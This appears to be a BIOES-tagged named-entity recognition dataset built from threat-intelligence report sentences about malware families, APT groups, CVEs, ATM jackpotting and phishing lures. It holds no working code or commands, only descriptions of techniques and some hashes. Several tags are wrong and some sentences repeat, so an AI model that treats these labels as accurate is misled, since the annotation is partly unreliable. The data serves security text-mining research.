+C:\WINDOWS\tasksche.exe S-FILE
+. O
+
+The O
+usefulness O
+of O
+flare-qdb S-FILE
+can O
+be O
+seen O
+in O
+cases O
+such O
+as O
+loops O
+dealing O
+with O
+strings O
+. O
+
+The O
+usefulness O
+of O
+flare-qdb S-FILE
+can O
+be O
+seen O
+in O
+cases O
+such O
+as O
+loops O
+dealing O
+with O
+strings O
+. O
+
+The O
+usefulness O
+of O
+flare-qdb S-FILE
+can O
+be O
+seen O
+in O
+cases O
+such O
+as O
+loops O
+dealing O
+with O
+strings O
+. O
+
+Attaching O
+with O
+IDA B-FILE
+Pro E-FILE
+via O
+WinDbg S-FILE
+as O
+in O
+Figure O
+11 O
+shows O
+that O
+the O
+program O
+counter O
+points O
+to O
+the O
+infinite O
+loop O
+written O
+in O
+memory O
+allocated O
+by O
+flare-qdb O
+. O
+
+We O
+have O
+also O
+observed O
+them S-FILE
+using O
+virtual O
+private O
+network O
+services O
+that O
+use O
+IPs O
+based O
+in O
+numerous O
+countries O
+to O
+ensure O
+anonymity O
+and O
+obfuscate O
+criminal O
+operations O
+. O
+
+Once O
+downloaded O
+and O
+executed O
+, O
+it O
+drops O
+an O
+intermediate O
+payload O
+that O
+further O
+downloads O
+a O
+Pony B-FILE
+DLL E-FILE
+and O
+Vawtrak S-FILE
+executable O
+, O
+which O
+perform O
+data O
+theft O
+and O
+connect O
+to O
+a O
+command O
+and O
+control O
+( O
+C2 S-TOOL
+) O
+server O
+. O
+
+The O
+attachment O
+in O
+these O
+emails S-TOOL
+is O
+a O
+weaponized O
+Microsoft B-ACT
+Office I-ACT
+document E-ACT
+containing O
+a O
+malicious O
+macro O
+that O
+– O
+when O
+enabled O
+– O
+leads O
+to O
+the O
+download O
+of O
+Hancitor S-FILE
+. O
+
+After O
+the O
+executable O
+is O
+executed O
+, O
+it O
+downloads O
+Pony S-FILE
+and O
+Vawtrak S-FILE
+malware O
+variants O
+to O
+steal O
+data O
+. O
+
+Upon O
+execution O
+, O
+it O
+will O
+communicate O
+with O
+an O
+attacker-controller O
+website O
+to O
+download O
+a O
+variant O
+of O
+the O
+Pony B-FILE
+malware E-FILE
+, O
+pm.dll” S-FILE
+along O
+with O
+a O
+standard O
+Vawtrak O
+Trojan S-MAL
+. O
+
+In O
+this O
+blog O
+, O
+FireEye S-SECTEAM
+Labs O
+dissects O
+this O
+new O
+ATM S-TOOL
+malware S-MAL
+that O
+we O
+have O
+dubbed O
+RIPPER S-MAL
+and O
+documents O
+indicators O
+that O
+strongly O
+suggest O
+this O
+piece O
+of O
+malware O
+is O
+the O
+one O
+used O
+to O
+steal O
+from O
+the O
+ATMs O
+at O
+banks S-IDTY
+in O
+Thailand S-LOC
+. O
+
+RIPPER S-MAL
+interacts O
+with O
+the O
+ATM O
+by O
+inserting O
+a O
+specially O
+manufactured O
+ATM O
+card O
+with O
+an O
+EMV O
+chip O
+that O
+serves O
+as O
+the O
+authentication O
+mechanism O
+. O
+
+RIPPER S-MAL
+will O
+examine O
+the O
+contents O
+of O
+directories O
+associated O
+with O
+the O
+targeted O
+ATM B-IDTY
+vendors E-IDTY
+and O
+will O
+replace O
+legitimate O
+executables O
+with O
+itself O
+. O
+
+This O
+malware S-FILE
+family O
+can O
+be O
+used O
+to O
+compromise O
+multiple O
+vendor O
+platforms O
+and O
+leverages O
+uncommon O
+technology O
+to O
+access O
+physical O
+devices O
+. O
+
+From O
+our O
+trend O
+analysis O
+seen O
+in O
+Figure O
+3 O
+, O
+Locky S-FILE
+ransomware O
+started O
+being O
+delivered O
+via O
+DOCM O
+format O
+email S-TOOL
+attachments O
+more O
+extensively O
+beginning O
+in O
+August S-TIME
+. O
+
+Discovered O
+for O
+the O
+first O
+time O
+in O
+Mexico S-LOC
+back O
+in O
+2013 S-TIME
+, O
+Ploutus S-FILE
+enabled O
+criminals O
+to O
+empty O
+ATMs O
+using O
+either O
+an O
+external O
+keyboard O
+attached O
+to O
+the O
+machine O
+or O
+via O
+SMS O
+message O
+, O
+a O
+technique O
+that O
+had O
+never O
+been O
+seen O
+before O
+. O
+
+FireEye S-SECTEAM
+Labs O
+recently O
+identified O
+a O
+previously O
+unobserved O
+version O
+of O
+Ploutus S-FILE
+, O
+dubbed O
+Ploutus-D S-FILE
+, O
+that O
+interacts O
+with O
+KAL’s O
+Kalignite O
+multivendor O
+ATM O
+platform O
+. O
+
+The O
+samples S-FILE
+we O
+identified O
+target O
+the O
+ATM B-IDTY
+vendor I-IDTY
+Diebold E-IDTY
+. O
+
+This O
+blog O
+covers O
+the O
+changes O
+, O
+improvements O
+, O
+and O
+Indicators O
+of O
+Compromise O
+(IOC) O
+of O
+Ploutus-D S-FILE
+in O
+order O
+to O
+help O
+financial S-IDTY
+organizations O
+identify O
+and O
+defend O
+against O
+this O
+threat O
+. O
+
+Ploutus-D S-FILE
+also O
+allows O
+the O
+attackers S-APT
+to O
+enter O
+the O
+amount O
+to O
+withdraw O
+(billUnits O
+– O
+4 O
+digits) O
+and O
+the O
+number O
+of O
+cycles O
+(billCount O
+– O
+2 O
+digits) O
+to O
+repeat O
+the O
+dispensing O
+operation O
+(see O
+Figure O
+10) O
+. O
+
+Ploutus-D S-FILE
+will O
+load O
+KXCashDispenserLib” O
+library O
+implemented O
+by O
+Kalignite O
+Platform O
+(K3A.Platform.dll) S-FILE
+to O
+interact O
+with O
+the O
+XFS O
+Manager O
+and O
+control O
+the O
+Dispenser O
+(see O
+Figure O
+13) O
+. O
+
+Since O
+Ploutus-D S-FILE
+interacts O
+with O
+the O
+Kalignite O
+Platform O
+, O
+only O
+minor O
+modifications O
+to O
+the O
+Ploutus-D S-FILE
+code O
+may O
+be O
+required O
+to O
+target O
+different O
+ATM B-IDTY
+vendors E-IDTY
+worldwide O
+. O
+
+The O
+threat O
+actors S-APT
+used O
+two O
+publicly O
+available O
+techniques O
+, O
+an O
+AppLocker O
+whitelisting O
+bypass O
+and O
+a O
+script O
+to O
+inject B-ACT
+shellcode E-ACT
+into O
+the O
+userinit.exe S-FILE
+process O
+. O
+
+The O
+regsvr32.exe S-FILE
+executable O
+can O
+be O
+used O
+to O
+download O
+a O
+Windows S-OS
+Script O
+Component O
+file O
+(SCT O
+file) O
+by O
+passing O
+the O
+URL O
+of O
+the O
+SCT B-FILE
+file E-FILE
+as O
+an O
+argument O
+. O
+
+We O
+observed O
+implementation O
+of O
+this O
+bypass O
+in O
+the O
+macro O
+code O
+to O
+invoke O
+regsvr32.exe S-FILE
+, O
+along O
+with O
+a O
+URL O
+passed O
+to O
+it O
+which O
+was O
+hosting O
+a O
+malicious O
+SCT B-FILE
+file E-FILE
+. O
+
+There O
+was O
+code O
+to O
+download O
+a O
+decoy O
+document O
+from O
+the O
+Internet O
+and O
+open O
+it O
+in O
+a O
+second O
+winword.exe S-FILE
+process O
+using O
+the O
+Start-Process S-FILE
+cmdlet S-FILE
+. O
+
+Ordnance S-FILE
+will O
+be O
+able O
+to O
+immediately O
+generate O
+shellcode O
+after O
+users O
+provide O
+the O
+IP S-PROT
+and O
+PROT O
+that O
+the O
+shellcode S-FILE
+should O
+connect O
+to O
+or O
+listen O
+on O
+. O
+
+DarkPulsar S-MAL
+is O
+a O
+very O
+interesting O
+administrative O
+module O
+for O
+controlling O
+a O
+passive O
+backdoor S-MAL
+named O
+' O
+sipauth32.tsp S-FILE
+' O
+that O
+provides O
+remote O
+control O
+, O
+belonging O
+to O
+this O
+category O
+. O
+
+One O
+of O
+them O
+– O
+ipv4.dll S-FILE
+– O
+has O
+been O
+placed O
+by O
+the O
+APT O
+with O
+what O
+is O
+, O
+in O
+fact O
+, O
+a O
+downloader S-MAL
+for O
+other O
+malicious O
+components O
+. O
+
+Written O
+in O
+pure O
+C S-TOOL
+language O
+, O
+Canhadr/Ndriver S-FILE
+provides O
+full O
+access O
+to O
+the O
+hard O
+drive O
+and O
+operating O
+memory O
+despite O
+device O
+security O
+restrictions O
+, O
+and O
+carries O
+out O
+integrity O
+control O
+of O
+various O
+system O
+components O
+to O
+avoid O
+debugging O
+and O
+security O
+detection O
+. O
+
+First O
+observed O
+in O
+mid-2014 S-TIME
+, O
+this O
+malware O
+shared O
+code O
+with O
+the O
+Bugat S-MAL
+( O
+aka O
+Feodo S-MAL
+) O
+banking S-IDTY
+Trojan S-MAL
+. O
+
+In O
+all O
+emails S-TOOL
+sent O
+to O
+these O
+government B-IDTY
+officials E-IDTY
+, O
+the O
+actor O
+used O
+the O
+same O
+attachment O
+: O
+a O
+malicious B-FILE
+Microsoft I-FILE
+Word I-FILE
+document E-FILE
+that O
+exploited O
+the O
+CVE-2012-0158 S-VULID
+vulnerability O
+to O
+drop O
+a O
+malicious O
+payload O
+. O
+
+Despite O
+being O
+an O
+older O
+vulnerability O
+, O
+many O
+threat O
+actors O
+continue O
+to O
+leverage O
+CVE-2012-0158 S-VULID
+to O
+exploit S-VULNAME
+Microsoft B-FILE
+Word E-FILE
+. O
+
+Whitefly S-APT
+first O
+infects O
+its O
+victims O
+using O
+a O
+dropper S-MAL
+in O
+the O
+form O
+of O
+a O
+malicious.exe S-FILE
+or O
+.dll B-FILE
+file E-FILE
+that O
+is O
+disguised O
+as O
+a O
+document O
+or O
+image O
+. O
+
+CraP2P S-FILE
+has O
+frequently O
+been O
+used O
+to O
+distribute O
+other O
+malware O
+such O
+as O
+Locky S-MAL
+and O
+Dridex S-MAL
+, O
+but O
+also O
+supported O
+large O
+scale O
+spam B-ACT
+campaigns E-ACT
+for O
+dating O
+advertisement O
+and O
+pump-and-dump O
+scams O
+after O
+the O
+demise O
+of O
+Kelihos O
+. O
+
+Once O
+the O
+LOWBALL S-MAL
+malware S-MAL
+calls O
+back O
+to O
+the O
+Dropbox S-TOOL
+account O
+, O
+the O
+admin@338 S-APT
+will O
+create O
+a O
+file O
+called O
+upload.bat S-FILE
+which O
+contains O
+commands O
+to O
+be O
+executed O
+on O
+the O
+compromised O
+computer O
+. O
+
+In O
+2014 S-TIME
+, O
+APT32 S-APT
+leveraged O
+a O
+spear-phishing S-ACT
+attachment E-ACT
+titled O
+" O
+Plans O
+to O
+crackdown O
+on O
+protesters O
+at O
+the O
+Embassy O
+of O
+Vietnam.exe S-FILE
+, O
+" O
+which O
+targeted O
+dissident O
+activity O
+among O
+the O
+Vietnamese S-LOC
+diaspora S-IDTY
+in O
+Southeast B-LOC
+Asia E-LOC
+. O
+
+In O
+2014 S-TIME
+, O
+APT32 S-APT
+leveraged O
+a O
+spear-phishing S-ACT
+attachment E-ACT
+titled O
+" O
+Plans O
+to O
+crackdown O
+on O
+protesters O
+at O
+the O
+Embassy O
+of O
+Vietnam.exe S-FILE
+" O
+. O
+
+More O
+recently O
+, O
+in O
+May B-TIME
+2017 E-TIME
+, O
+APT33 S-APT
+appeared O
+to O
+target O
+a O
+Saudi S-LOC
+organization S-IDTY
+and O
+a O
+South B-LOC
+Korean E-LOC
+business B-IDTY
+conglomerate E-IDTY
+using O
+a O
+malicious B-FILE
+file E-FILE
+that O
+attempted O
+to O
+entice O
+victims O
+with O
+job O
+vacancies O
+for O
+a O
+Saudi B-LOC
+Arabian E-LOC
+petrochemical B-IDTY
+company E-IDTY
+. O
+
+More O
+recently O
+, O
+in O
+May B-TIME
+2017 E-TIME
+, O
+APT33 S-APT
+appeared O
+to O
+target O
+organizations O
+in O
+Saudi S-LOC
+and O
+South B-LOC
+Korea E-LOC
+using O
+a O
+malicious B-FILE
+file E-FILE
+that O
+attempted O
+to O
+entice O
+victims O
+with O
+job O
+vacancies O
+. O
+
+In O
+fact O
+, O
+REDBALDKNIGHT S-APT
+has O
+been O
+targeting O
+Japan S-LOC
+as O
+early O
+as O
+2008 S-TIME
+, O
+based O
+on O
+the O
+file O
+properties O
+of O
+the O
+decoy B-FILE
+documents E-FILE
+they've O
+been O
+sending O
+to O
+their O
+targets O
+. O
+
+In O
+fact O
+, O
+REDBALDKNIGHT S-APT
+has O
+been O
+zeroing O
+in O
+on O
+Japanese S-LOC
+organizations O
+as O
+early O
+as O
+2008 S-TIME
+— O
+at O
+least O
+based O
+on O
+the O
+file O
+properties O
+of O
+the O
+decoy B-FILE
+documents E-FILE
+they've O
+been O
+sending O
+to O
+their O
+targets O
+. O
+
+Carbanak S-FILE
+is O
+a O
+backdoor S-MAL
+used O
+by O
+the O
+attackers S-APT
+to O
+compromise O
+the O
+victim O
+. O
+
+This O
+Gorgon B-ACT
+Group I-ACT
+campaign E-ACT
+leveraged O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+with O
+Microsoft B-FILE
+Word I-FILE
+documents E-FILE
+exploiting O
+CVE-2017-0199 S-VULID
+. O
+
+The O
+Korean-language O
+Word B-MAL
+document E-MAL
+manual.doc S-FILE
+appeared O
+in O
+Vietnam S-LOC
+on O
+January B-TIME
+17 E-TIME
+, O
+with O
+the O
+original O
+author O
+name O
+of O
+Honeybee S-APT
+. O
+
+This O
+malicious O
+document O
+contains O
+a O
+Visual B-ACT
+Basic I-ACT
+macro E-ACT
+that O
+dropped O
+and O
+executed O
+an O
+upgraded O
+version O
+of O
+the O
+implant O
+known O
+as O
+SYSCON S-MAL
+, O
+which O
+appeared O
+in O
+2017 S-TIME
+in O
+malicious B-FILE
+Word I-FILE
+documents E-FILE
+as O
+part O
+of O
+several O
+campaigns S-ACT
+using O
+North S-LOC
+Korea–related O
+topics O
+. O
+
+Ke3chang S-APT
+has O
+also O
+leveraged O
+a O
+Java S-TOOL
+zero-day S-VULNAME
+vulnerability O
+( O
+CVE-2012-4681 S-VULID
+) O
+, O
+as O
+well O
+as O
+older O
+, O
+reliable O
+exploits O
+for O
+Microsoft B-FILE
+Word E-FILE
+( O
+CVE-2010-3333 S-VULID
+) O
+and O
+Adobe B-MAL
+PDF I-MAL
+Reader E-MAL
+( O
+CVE-2010-2883 S-VULID
+) O
+. O
+
+For O
+example O
+, O
+DeltaAlfa S-FILE
+specifies O
+a O
+DDoS B-MAL
+bot E-MAL
+family O
+identified O
+as O
+Alfa O
+. O
+
+This O
+alert O
+'s O
+IOC B-FILE
+files E-FILE
+provide O
+HIDDEN B-APT
+COBRA E-APT
+indicators O
+related O
+to O
+FALLCHILL S-MAL
+. O
+
+The O
+McAfee B-SECTEAM
+Advanced I-SECTEAM
+Threat I-SECTEAM
+Research E-SECTEAM
+team O
+discovered O
+a O
+previously O
+unknown O
+data-gathering B-FILE
+implant E-FILE
+that O
+surfaced O
+in O
+mid-February B-TIME
+2018 E-TIME
+. O
+
+This O
+alert O
+'s O
+IOC B-FILE
+files E-FILE
+provide O
+HIDDEN B-APT
+COBRA E-APT
+indicators O
+related O
+to O
+FALLCHILL S-MAL
+. O
+
+The O
+McAfee B-SECTEAM
+Advanced I-SECTEAM
+Threat I-SECTEAM
+Research E-SECTEAM
+team O
+discovered O
+a O
+previously O
+unknown O
+data-gathering B-FILE
+implant E-FILE
+that O
+surfaced O
+in O
+mid-February B-TIME
+2018 E-TIME
+. O
+
+Documents S-FILE
+with O
+the O
+flash S-TOOL
+exploit S-VULNAME
+managed O
+to O
+evade O
+static O
+defenses O
+and O
+remain O
+undetected O
+as O
+an O
+exploit S-VULNAME
+on O
+VirusTotal S-TOOL
+. O
+
+This O
+malware O
+report O
+contains O
+analysis O
+of O
+one O
+32-bit B-FILE
+Windows I-FILE
+executable I-FILE
+file E-FILE
+, O
+identified O
+as O
+a O
+Remote B-MAL
+Access I-MAL
+Trojan E-MAL
+( O
+RAT S-MAL
+) O
+. O
+
+In O
+one O
+of O
+the O
+samples O
+received O
+for O
+analysis O
+, O
+the O
+US-CERT B-SECTEAM
+Code I-SECTEAM
+Analysis I-SECTEAM
+Team E-SECTEAM
+observed O
+botnet B-FILE
+controller E-FILE
+functionality O
+. O
+
+Volgmer S-MAL
+payloads O
+have O
+been O
+observed O
+in O
+32-bit O
+form O
+as O
+either O
+executables O
+or O
+dynamic-link B-TOOL
+library E-TOOL
+( O
+.dll S-FILE
+) O
+
+Trend B-SECTEAM
+Micro E-SECTEAM
+endpoint O
+solutions O
+such O
+as O
+Trend B-SECTEAM
+Micro™ I-SECTEAM
+Smart I-SECTEAM
+Protection I-SECTEAM
+Suites E-SECTEAM
+and O
+Worry-Free™ B-SECTEAM
+Business I-SECTEAM
+Security E-SECTEAM
+can O
+protect O
+users O
+and O
+businesses S-IDTY
+from O
+these O
+threats O
+by O
+detecting O
+malicious B-FILE
+files E-FILE
+and O
+spammed O
+messages O
+as O
+well O
+as O
+blocking O
+all O
+related O
+malicious O
+URLs O
+. O
+
+WannaCry S-MAL
+appends O
+encrypted O
+data O
+files O
+with O
+the O
+.WCRY S-FILE
+extension O
+, O
+drops O
+and O
+executes O
+a O
+decryptor O
+tool O
+, O
+and O
+demands O
+$300 O
+or O
+$600 O
+USD O
+( O
+via O
+Bitcoin S-TOOL
+) O
+to O
+decrypt O
+the O
+data O
+. O
+
+Some O
+of O
+the O
+documents S-FILE
+exploited O
+CVE-2017-0199 S-VULID
+to O
+deliver O
+the O
+payload O
+. O
+
+The O
+Leviathan S-APT
+also O
+occasionally O
+used O
+macro-laden B-FILE
+Microsoft I-FILE
+Word I-FILE
+documents E-FILE
+to O
+target O
+other O
+US S-LOC
+research O
+and O
+development B-IDTY
+organizations E-IDTY
+during O
+this O
+period O
+. O
+
+The O
+download O
+name O
+was O
+" O
+Zawgyi_Keyboard_L.zip S-FILE
+" O
+, O
+and O
+it O
+dropped O
+a O
+" O
+setup.exe S-FILE
+" O
+that O
+contained O
+several O
+backdoor O
+components O
+, O
+including O
+an O
+Elise S-MAL
+" O
+wincex.dll S-FILE
+" O
+( O
+a42c966e26f3577534d03248551232f3 S-MD5
+, O
+detected O
+as O
+Backdoor.Win32.Agent.delp S-MAL
+) O
+. O
+
+Both O
+attachments O
+are O
+malicious B-FILE
+Word I-FILE
+documents E-FILE
+that O
+attempt O
+to O
+exploit S-VULNAME
+the O
+Windows S-OS
+OLE B-TOOL
+Automation I-TOOL
+Array I-TOOL
+Remote I-TOOL
+Code I-TOOL
+Execution E-TOOL
+Vulnerability S-VULNAME
+tracked O
+by O
+CVE-2014-6332 S-VULID
+. O
+
+To O
+set O
+up O
+persistence O
+, O
+the O
+loader O
+writes O
+a O
+file O
+to O
+" O
+c:\temp\rr.exe S-FILE
+" O
+and O
+executes O
+it O
+with O
+specific O
+command O
+line O
+arguments O
+to O
+create O
+auto O
+run O
+registry O
+keys O
+. O
+
+The O
+Magic B-ACT
+Hound I-ACT
+campaign E-ACT
+was O
+also O
+discovered O
+using O
+a O
+custom B-MAL
+dropper E-MAL
+tool O
+, O
+which O
+we O
+have O
+named O
+MagicHound.DropIt S-FILE
+. O
+
+For O
+example O
+, O
+we O
+analyzed O
+a O
+DropIt S-MAL
+sample O
+( O
+SHA256 S-ENCR
+: O
+cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 S-SHA2
+) O
+that O
+dropped O
+two O
+executables O
+, O
+one O
+of O
+which O
+was O
+saved O
+to O
+" O
+%TEMP%\flash_update.exe S-FILE
+" O
+that O
+was O
+a O
+legitimate O
+Flash B-MAL
+Player I-MAL
+installer E-MAL
+. O
+
+During O
+a O
+recent O
+campaign O
+, O
+APT32 S-APT
+leveraged O
+social B-ACT
+engineering E-ACT
+emails S-TOOL
+with O
+Microsoft B-FILE
+ActiveMime I-FILE
+file E-FILE
+attachments O
+to O
+deliver O
+malicious O
+macros O
+. O
+
+The O
+HTA B-FILE
+files E-FILE
+contained O
+job O
+descriptions O
+and O
+links O
+to O
+job O
+postings O
+on O
+popular O
+employment O
+websites O
+. O
+
+These O
+emails S-TOOL
+included O
+recruitment-themed B-ACT
+lures E-ACT
+and O
+links O
+to O
+malicious O
+HTML B-TOOL
+Application E-TOOL
+( O
+HTA S-TOOL
+) O
+files O
+. O
+
+POWRUNER S-MAL
+was O
+delivered O
+using O
+a O
+malicious O
+RTF B-FILE
+file E-FILE
+that O
+exploited O
+CVE-2017-0199 S-VULID
+. O
+
+ChopShop1 S-FILE
+is O
+a O
+new O
+framework O
+developed O
+by O
+the O
+MITRE B-IDTY
+Corporation E-IDTY
+for O
+network-based O
+protocol O
+decoders O
+that O
+enable O
+security O
+professionals O
+to O
+understand O
+actual O
+commands O
+issued O
+by O
+human O
+operators O
+controlling O
+endpoints O
+. O
+
+Attachments S-FILE
+are O
+typically O
+sent O
+as O
+an O
+executable O
+file O
+embedded O
+in O
+a O
+ZIP B-ACT
+archive E-ACT
+or O
+a O
+password-protected B-ACT
+Microsoft I-ACT
+Office I-ACT
+document E-ACT
+. O
+
+This O
+blog O
+post O
+analyzes O
+several O
+recent O
+Molerats B-ACT
+attacks E-ACT
+that O
+deployed O
+PIVY S-MAL
+against O
+targets O
+in O
+the O
+Middle B-LOC
+East E-LOC
+and O
+in O
+the O
+U.S. S-LOC
+We O
+also O
+examine O
+additional O
+PIVY B-ACT
+attacks E-ACT
+that O
+leverage O
+Arabic-language O
+content O
+related O
+to O
+the O
+ongoing O
+crisis O
+in O
+Egypt S-LOC
+and O
+the O
+wider O
+Middle B-LOC
+East E-LOC
+to O
+lure O
+targets O
+into O
+opening O
+malicious B-FILE
+files E-FILE
+. O
+
+The O
+archive O
+contains O
+an O
+.exe B-FILE
+file E-FILE
+, O
+sometimes O
+disguised O
+as O
+a O
+Microsoft B-FILE
+Word I-FILE
+file E-FILE
+, O
+a O
+video O
+, O
+or O
+another O
+file O
+format O
+, O
+using O
+the O
+corresponding O
+icon O
+. O
+
+The O
+Palo B-SECTEAM
+Alto I-SECTEAM
+Networks I-SECTEAM
+Unit I-SECTEAM
+42 E-SECTEAM
+research O
+team O
+recently O
+came O
+across O
+a O
+series O
+of O
+malicious B-FILE
+files E-FILE
+which O
+were O
+almost O
+identical O
+to O
+those O
+targeting O
+the O
+Saudi B-LOC
+Arabian E-LOC
+government S-IDTY
+previously O
+discussed O
+by O
+MalwareBytes S-SECTEAM
+. O
+
+We O
+found O
+new O
+variants O
+of O
+the O
+Powermud B-MAL
+backdoor E-MAL
+, O
+a O
+new O
+backdoor O
+( O
+Backdoor.Powemuddy S-MAL
+) O
+, O
+and O
+custom B-MAL
+tools E-MAL
+for O
+stealing O
+passwords O
+, O
+creating O
+reverse O
+shells O
+, O
+privilege O
+escalation O
+, O
+and O
+the O
+use O
+of O
+the O
+native O
+Windows S-OS
+cabinet O
+creation O
+tool O
+, O
+makecab.exe S-FILE
+, O
+probably O
+for O
+compressing O
+stolen O
+data O
+to O
+be O
+uploaded O
+. O
+
+Analysts O
+in O
+our O
+DeepSight B-SECTEAM
+Managed I-SECTEAM
+Adversary I-SECTEAM
+and I-SECTEAM
+Threat I-SECTEAM
+Intelligence E-SECTEAM
+( O
+MATI S-SECTEAM
+) O
+team O
+have O
+found O
+a O
+new O
+backdoor O
+, O
+Backdoor.Powemuddy S-FILE
+, O
+new O
+variants O
+of O
+Seedworm S-APT
+'s O
+Powermud B-FILE
+backdoor E-FILE
+( O
+aka O
+POWERSTATS S-MAL
+) O
+, O
+a O
+GitHub O
+repository O
+used O
+by O
+the O
+group O
+to O
+store O
+their O
+scripts O
+, O
+as O
+well O
+as O
+several O
+post-compromise O
+tools O
+the O
+group O
+uses O
+to O
+exploit S-VULNAME
+victims O
+once O
+they O
+have O
+established O
+a O
+foothold O
+in O
+their O
+network O
+. O
+
+Like O
+the O
+previous O
+campaigns S-ACT
+, O
+these O
+samples O
+again O
+involve O
+a O
+Microsoft B-TOOL
+Word E-TOOL
+document O
+embedded O
+with O
+a O
+malicious O
+macro O
+that O
+is O
+capable O
+of O
+executing O
+PowerShell S-TOOL
+( O
+PS S-TOOL
+) O
+scripts O
+leading O
+to O
+a O
+backdoor O
+payload O
+. O
+
+In O
+May B-TIME
+2018 E-TIME
+, O
+Trend B-SECTEAM
+Micro E-SECTEAM
+found O
+a O
+new O
+sample O
+( O
+Detected O
+as O
+W2KM_DLOADR.UHAOEEN S-MAL
+) O
+that O
+may O
+be O
+related O
+to O
+this O
+campaign O
+. O
+
+In O
+May B-TIME
+2018 E-TIME
+, O
+Trend B-SECTEAM
+Micro E-SECTEAM
+found O
+a O
+new O
+sample O
+( O
+Detected O
+as O
+W2KM_DLOADR.UHAOEEN S-MAL
+) O
+that O
+may O
+be O
+related O
+to O
+this O
+campaign O
+. O
+
+This O
+bait B-FILE
+document E-FILE
+, O
+or O
+email B-ACT
+attachment E-ACT
+, O
+appears O
+to O
+be O
+a O
+standard O
+Word S-TOOL
+document O
+, O
+but O
+is O
+in O
+fact O
+an O
+CVE-2012-0158 S-VULID
+exploit S-VULNAME
+, O
+an O
+executable O
+with O
+a O
+double O
+extension O
+, O
+or O
+an O
+executable O
+with O
+an O
+RTLO O
+filename O
+, O
+so O
+it O
+can O
+execute O
+code O
+without O
+the O
+user O
+'s O
+knowledge O
+or O
+consent O
+. O
+
+Taking O
+a O
+step O
+back O
+, O
+as O
+discussed O
+in O
+the O
+Appendix O
+in O
+our O
+initial O
+OilRig S-APT
+blog O
+, O
+Clayslide B-FILE
+delivery I-FILE
+documents E-FILE
+initially O
+open O
+with O
+a O
+worksheet O
+named O
+" O
+Incompatible O
+" O
+that O
+displays O
+content O
+that O
+instructs O
+the O
+user O
+to O
+" O
+Enable O
+Content O
+" O
+to O
+see O
+the O
+contents O
+of O
+the O
+document O
+, O
+which O
+in O
+fact O
+runs O
+the O
+malicious O
+macro O
+and O
+compromises O
+the O
+system O
+. O
+
+The O
+backdoor O
+was O
+delivered O
+via O
+a O
+malicious O
+.rtf B-FILE
+file E-FILE
+that O
+exploited O
+CVE-2017-0199 S-VULID
+. O
+
+The O
+vulnerability O
+exists O
+in O
+the O
+old O
+Equation B-MAL
+Editor E-MAL
+( O
+EQNEDT32.EXE S-FILE
+) O
+, O
+a O
+component O
+of O
+Microsoft S-IDTY
+Office O
+that O
+is O
+used O
+to O
+insert O
+and O
+evaluate O
+mathematical O
+formulas O
+. O
+
+The O
+January B-ACT
+8 I-ACT
+attack E-ACT
+used O
+a O
+variant O
+of O
+the O
+ThreeDollars B-FILE
+delivery I-FILE
+document E-FILE
+, O
+which O
+we O
+identified O
+as O
+part O
+of O
+the O
+OilRig S-APT
+toolset O
+based O
+on O
+attacks O
+that O
+occurred O
+in O
+August B-TIME
+2017 E-TIME
+. O
+
+The O
+email S-ACT
+contained O
+an O
+attachment O
+named O
+Seminar-Invitation.doc S-FILE
+, O
+which O
+is O
+a O
+malicious O
+Microsoft B-TOOL
+Word E-TOOL
+document O
+we O
+track O
+as O
+ThreeDollars S-MAL
+. O
+
+We O
+also O
+identified O
+another O
+sample O
+of O
+ThreeDollars S-MAL
+, O
+created O
+on O
+January B-TIME
+15 E-TIME
+, O
+2017 S-TIME
+with O
+the O
+file O
+name O
+strategy O
+preparation.dot S-FILE
+. O
+
+We O
+had O
+previously O
+observed O
+this O
+author O
+name O
+in O
+use O
+once O
+before O
+, O
+in O
+the O
+very O
+first O
+ThreeDollars B-FILE
+document E-FILE
+we O
+collected O
+that O
+we O
+had O
+reported O
+on O
+in O
+August B-TIME
+2017 E-TIME
+. O
+
+The O
+June B-TIME
+2017 E-TIME
+sample O
+of O
+Clayslide S-MAL
+contained O
+the O
+same O
+OfficeServicesStatus.vbs B-FILE
+file E-FILE
+found O
+in O
+the O
+ISMAgent B-MAL
+Clayslide I-MAL
+document E-MAL
+, O
+but O
+instead O
+of O
+having O
+the O
+payload O
+embedded O
+in O
+the O
+macro O
+as O
+segregated O
+base64 O
+strings O
+that O
+would O
+be O
+concatenated O
+, O
+this O
+variant O
+obtained O
+its O
+payload O
+from O
+multiple O
+cells O
+within O
+the O
+" O
+Incompatible O
+" O
+worksheet O
+. O
+
+During O
+this O
+testing O
+, O
+we O
+saw O
+document O
+filenames O
+that O
+contain O
+the O
+C2 S-TOOL
+we O
+witnessed O
+in O
+the O
+targeted B-ACT
+attack E-ACT
+above O
+, O
+specifically O
+the O
+filenames O
+XLS-withyourface.xls S-FILE
+and O
+XLS-withyourface B-FILE
+– I-FILE
+test.xls E-FILE
+. O
+
+These O
+samples O
+appeared O
+to O
+have O
+been O
+created O
+by O
+OilRig S-APT
+during O
+their O
+development O
+and O
+testing B-ACT
+activities E-ACT
+, O
+all O
+of O
+which O
+share O
+many O
+similarities O
+with O
+the O
+delivery O
+document O
+used O
+in O
+the O
+recent O
+OilRig B-APT
+attack E-APT
+against O
+a O
+Middle B-LOC
+Eastern E-LOC
+government S-IDTY
+, O
+N56.15.doc S-FILE
+( O
+7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00 S-SHA2
+) O
+that O
+we O
+have O
+also O
+included O
+in O
+Table O
+1 O
+. O
+
+The O
+attackers S-APT
+sent O
+multiple O
+emails S-TOOL
+containing O
+macro-enabled O
+XLS B-FILE
+files E-FILE
+to O
+employees B-IDTY
+working I-IDTY
+in I-IDTY
+the I-IDTY
+banking I-IDTY
+sector E-IDTY
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+In O
+the O
+first O
+week O
+of O
+May B-TIME
+2016 E-TIME
+, O
+FireEye B-SECTEAM
+'s I-SECTEAM
+DTI E-SECTEAM
+identified O
+a O
+wave O
+of O
+emails S-TOOL
+containing O
+malicious B-FILE
+attachments E-FILE
+being O
+sent O
+to O
+multiple O
+banks S-IDTY
+in O
+the O
+Middle B-LOC
+East E-LOC
+region O
+. O
+
+Their O
+next O
+move O
+was O
+to O
+list O
+any O
+remote O
+shared O
+drives O
+and O
+then O
+attempt O
+to O
+access O
+remote O
+shares O
+owned O
+by O
+the O
+specific O
+government B-IDTY
+office E-IDTY
+they O
+were O
+targeting O
+, O
+again O
+attempting O
+to O
+extract O
+all O
+Word B-FILE
+documents E-FILE
+. O
+
+For O
+example O
+, O
+in O
